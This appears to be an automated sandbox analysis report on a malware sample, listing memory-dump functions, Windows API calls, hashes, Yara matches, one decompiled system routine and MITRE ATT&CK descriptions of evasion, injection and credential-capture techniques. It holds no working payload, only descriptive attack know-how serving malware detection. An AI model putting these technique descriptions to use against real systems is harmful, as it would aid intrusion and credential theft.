Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ba25f58cc8bd7aeec908175fd2c81628db104ba06fc51ec061cd6d06a9621daf
Instruction ID: 683f05895e0cae19564c1a13b2c1192f2d4679fd46db0a50f2f3829b53c1e5c1
Opcode Fuzzy Hash: ba25f58cc8bd7aeec908175fd2c81628db104ba06fc51ec061cd6d06a9621daf
Instruction Fuzzy Hash: FC9002B120100943F10061594404B46050A9BE0345F61C016A0126654D8655D8517561

Uniqueness

Uniqueness Score: -1.00%

Function 04C696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C696EA

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 06da63b4a439e1b1dd543961866c2e93afc9d808ebe14deb86c276cae370af8b
Instruction ID: 564c210ff3ab62329bb272210da25cc24722c4c9481099db53c392fd59640aee
Opcode Fuzzy Hash: 06da63b4a439e1b1dd543961866c2e93afc9d808ebe14deb86c276cae370af8b
Instruction Fuzzy Hash: BE9002B120108903F1106159840474A050A9BD0345F65C411A4426658D86D5D8917161

Uniqueness

Uniqueness Score: -1.00%

Function 04C69650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C6965A

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e49502d2fafbaa4297a072411338cdfc7ece53f681031914fa9f0cf658c360e
Instruction ID: 1d2cd4151ec653633399664b8b476f0ff7367c281d0ece60fef9226ccf1a7522
Opcode Fuzzy Hash: 3e49502d2fafbaa4297a072411338cdfc7ece53f681031914fa9f0cf658c360e
Instruction Fuzzy Hash: EE9002B120504943F14071594404A46051A9BD0349F61C011A0066694D9665DD55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04C69660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C6966A

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d2e3ff8e76b05a57fc6697d3bf6cf8003db84e0e081b1cabaa76fa67d437caf
Instruction ID: 5fabca551b1649a9d827bdf54ed655098f16fc1e9a69f4dbf913becf25fe7615
Opcode Fuzzy Hash: 9d2e3ff8e76b05a57fc6697d3bf6cf8003db84e0e081b1cabaa76fa67d437caf
Instruction Fuzzy Hash: 459002B120100903F1807159440464A050A9BD1345FA1C015A0027654DCA55DA5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04C69FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C69FEA

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ccc7d605947045e6d537ab3c3790c73157b2b07186a3cddc5a09415efaaab6e
Instruction ID: 0b7c45f2f65fdf6feb548b92b6d92f3de919ce4d7124c086a895c7862907eb96
Opcode Fuzzy Hash: 6ccc7d605947045e6d537ab3c3790c73157b2b07186a3cddc5a09415efaaab6e
Instruction Fuzzy Hash: 2A9002B131114503F11061598404706050A9BD1245F61C411A0826558D86D5D8917162

Uniqueness

Uniqueness Score: -1.00%

Function 04C69780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C6978A

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 75bc3d2669ff03d8f829377ffd46edbb57f8a0ef8f5cad1f89bc44574a7c199b
Instruction ID: c36efb5a6e0970fa59f2e206cef6f092cf67ab28eab0296e87f645c2690ba94a
Opcode Fuzzy Hash: 75bc3d2669ff03d8f829377ffd46edbb57f8a0ef8f5cad1f89bc44574a7c199b
Instruction Fuzzy Hash: 789002A921300103F1807159540860A050A9BD1246FA1D415A0017558CC955D8696361

Uniqueness

Uniqueness Score: -1.00%

Function 04C69710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C6971A

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4cfaa5f232c60cd5812971451b2267c7d221966dfd52aa21e5707d2e0687d019
Instruction ID: b302c453d2b5c68e593a9cb7c00f06941f9df074cbd8eb463473acf42d79cf99
Opcode Fuzzy Hash: 4cfaa5f232c60cd5812971451b2267c7d221966dfd52aa21e5707d2e0687d019
Instruction Fuzzy Hash: 9F9002B120100503F10065995408646050A9BE0345F61D011A5026555EC6A5D8917171

Uniqueness

Uniqueness Score: -1.00%

Function 04C69840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C6984A

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d5e8499c71c959e5b316a9775855ee05db8669374fdb1b7fcfcb79f508ddb7b1
Instruction ID: a9c2c34b09120d69ce0b0499639e797423766586c74dc2c44f0c7b7d5f285783
Opcode Fuzzy Hash: d5e8499c71c959e5b316a9775855ee05db8669374fdb1b7fcfcb79f508ddb7b1
Instruction Fuzzy Hash: 1E9002A1242042537545B1594404507450BABE0285BA1C012A1416950C8566E856E661

Uniqueness

Uniqueness Score: -1.00%

Function 04C69860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C6986A

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ebbb221e750974e7be68e169e8d5ea139d64c31fdc348e7b4a3cf04e9695de16
Instruction ID: 81c5d99376c3cb13d5abd7cfe5a70a96b4863c681502554e1c7b0241ec3d5519
Opcode Fuzzy Hash: ebbb221e750974e7be68e169e8d5ea139d64c31fdc348e7b4a3cf04e9695de16
Instruction Fuzzy Hash: 929002B120100513F11161594504707050E9BD0285FA1C412A0426558D9696D952B161

Uniqueness

Uniqueness Score: -1.00%

Function 04C699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C699AA

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0e867e7466fdda8b050fbee35438b7ca24283b7a7fc7e9f58633f815fdcf605a
Instruction ID: 0444e274a19191ecc498cefee1757b5b77b1cd417608db355217d8f5b6438bd2
Opcode Fuzzy Hash: 0e867e7466fdda8b050fbee35438b7ca24283b7a7fc7e9f58633f815fdcf605a
Instruction Fuzzy Hash: C19002E134100543F10061594414B06050ADBE1345F61C015E1066554D8659DC527166

Uniqueness

Uniqueness Score: -1.00%

Function 04C69910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C6991A

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 419ec2e2fae5ce8b38dba2ddd194784360b33930a1839569e521d6375d7130bd
Instruction ID: c614354f2443289273b888cbbf52568da0c104e27f98df0067f6b976fcc0bee9
Opcode Fuzzy Hash: 419ec2e2fae5ce8b38dba2ddd194784360b33930a1839569e521d6375d7130bd
Instruction Fuzzy Hash: BF9002F120100503F14071594404746050A9BD0345F61C011A5066554E8699DDD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 04C69A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C69A5A

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f1401da02edf08bf2735193de5aad3ef3b2be0efea77f0a6e5e0d87a3ff11c1b
Instruction ID: 964fdb3e86c69530e270c33b0b7cf77f24279f706bff09534c801da521470b7c
Opcode Fuzzy Hash: f1401da02edf08bf2735193de5aad3ef3b2be0efea77f0a6e5e0d87a3ff11c1b
Instruction Fuzzy Hash: 9B9002A121180143F20065694C14B07050A9BD0347F61C115A0156554CC955D8616561

Uniqueness

Uniqueness Score: -1.00%

Function 030AA070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03093AF8), ref: 030AA09D

Strings

.z`, xrefs: 030AA08C, 030AA098

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 0f83cb5863e49d4fef905eb9608b923f441dd1499684da009e4b3522fda021ec
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 22E01AB52002086BD714DF99DC44EA777ACEF88650F018554B9085B241C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 0309F698, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,03098CF4,?), ref: 0309F6CB

Strings

s#:q, xrefs: 0309F698

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID: s#:q
API String ID: 2340568224-1617868548
Opcode ID: 73d2b384aa681fc84634398036b097e703388f669a86994509815d87f67aa425
Instruction ID: 8cea44ddb9410f65a297599c5d10615ac418801bd90320dd7129ad811c75a8ce
Opcode Fuzzy Hash: 73d2b384aa681fc84634398036b097e703388f669a86994509815d87f67aa425
Instruction Fuzzy Hash: C1D02B357403003FFF00EAA49C02F5232C4AB45201F0800A5F6C8EB2C3D950D0008614

Uniqueness

Uniqueness Score: -1.00%

Function 030982F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0309834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0309836B

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction ID: 3e1c8a011afc3a23188f2d978255a81d7561dc25d3940f874e76e9c72c5ba921
Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction Fuzzy Hash: 6101F231A813287BFB20E6989C02FFE776CAB81A50F044019FF04BE2C0E6D4690642F9

Uniqueness

Uniqueness Score: -1.00%

Function 030AA1C1, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0309F1A2,0309F1A2,?,00000000,?,?), ref: 030AA200

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 01e311cfc141d4552dba70982ee4f6fccfe2a951ac07bb906500b9061bae3e8a
Instruction ID: 5ad62e8dcc81ff62f63b2f4a2cb860c1594466ebbd834c5dc96848789e820d27
Opcode Fuzzy Hash: 01e311cfc141d4552dba70982ee4f6fccfe2a951ac07bb906500b9061bae3e8a
Instruction Fuzzy Hash: 2FF04FB5600204AFDB24DFA9DC81EEB77ADEF88650F108659F94D97242C631E811CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 030AA0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030AA134

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: d75651f887f31f666ff383a78b02c52233f8621f3caf77f79db816817a0aaa03
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: B401AFB2214208ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 030AA1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0309F1A2,0309F1A2,?,00000000,?,?), ref: 030AA200

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: e1ded5931ee989cb3461055d1a8373c6e8d5837551b5f3f946dec8a912ab7b2f
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 8BE01AB52002086BDB10DF89DC84EE737ADEF88650F018154BA086B241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 030AA030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(030A4506,?,030A4C7F,030A4C7F,?,030A4506,?,?,?,?,?,00000000,00000000,?), ref: 030AA05D

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: da9a587c78ce8b72e2f19d69b1c7d6769d423f24a700d282018ffd048170b7c1
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: ECE012B5200208ABDB14EF99DC80EA777ACEF88650F118558BA086B281C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 0309F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,03098CF4,?), ref: 0309F6CB

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: c69c30fa97e4cf9f75cebe304c0b44006bfd65f6530ac9f458bcbd2fa8345260
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: 2CD0A7757903043BFA10FAE99C03F6673CD5B44A01F490064FA88DB3C3E990F0004165

Uniqueness

Uniqueness Score: -1.00%

Function 030982EE, Relevance: 1.5, APIs: 1, Instructions: 16threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0309836B

Memory Dump Source

Source File: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Offset: 03090000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b836f3162e5e3d70dc7ea4a531468511422e72b05735ca4184b77deea9b388c7
Instruction ID: a3b1c01fabebec5968a44b84c62773d3f066cc065e1419934ee7e27c1568afe2
Opcode Fuzzy Hash: b836f3162e5e3d70dc7ea4a531468511422e72b05735ca4184b77deea9b388c7
Instruction Fuzzy Hash: ADC0121278111825EA109589BC42BBD3314D7C5A12F04856BFB4CD81C09985111D57E1

Uniqueness

Uniqueness Score: -1.00%

Function 04C6967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C69694

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 901cf37dbc6a3863b6745e88a1b814d6c39ed12d2408abb03965398d77c8400f
Instruction ID: 2dd55762496c352485716382efd15fbbd5fadeb8622a56383a5ad5ca22d30fd2
Opcode Fuzzy Hash: 901cf37dbc6a3863b6745e88a1b814d6c39ed12d2408abb03965398d77c8400f
Instruction Fuzzy Hash: CCB09BF19015C5C6F751D76047087177E157BD0745F26C051D1031641A4778D191F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04CBFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04CBFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04C6CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04CB5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04CB5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04cbfdda
0x04cbfde2
0x04cbfde5
0x04cbfdec
0x04cbfdfa
0x04cbfdff
0x04cbfe0a
0x04cbfe0f
0x04cbfe17
0x04cbfe1e
0x04cbfe19
0x04cbfe19
0x04cbfe19
0x04cbfe20
0x04cbfe21
0x04cbfe22
0x04cbfe25
0x04cbfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04CBFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04CBFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04CBFE01

Memory Dump Source

Source File: 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: true

Associated: 00000009.00000002.747678270.0000000004D1B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.747697951.0000000004D1F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 00b1c2531350e568104bbbfc5b028b64a0a48d871a2a4757616cd294ceff6590
Instruction ID: e96a07f5b6d2fa3330e32e0dfaf9dbb166be1e070a4e128b31caa5aae92a23d4
Opcode Fuzzy Hash: 00b1c2531350e568104bbbfc5b028b64a0a48d871a2a4757616cd294ceff6590
Instruction Fuzzy Hash: D2F0F636240241BFE6211E45DC02F73BB6BEB45734F144314F668661E1EA62F930A7F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
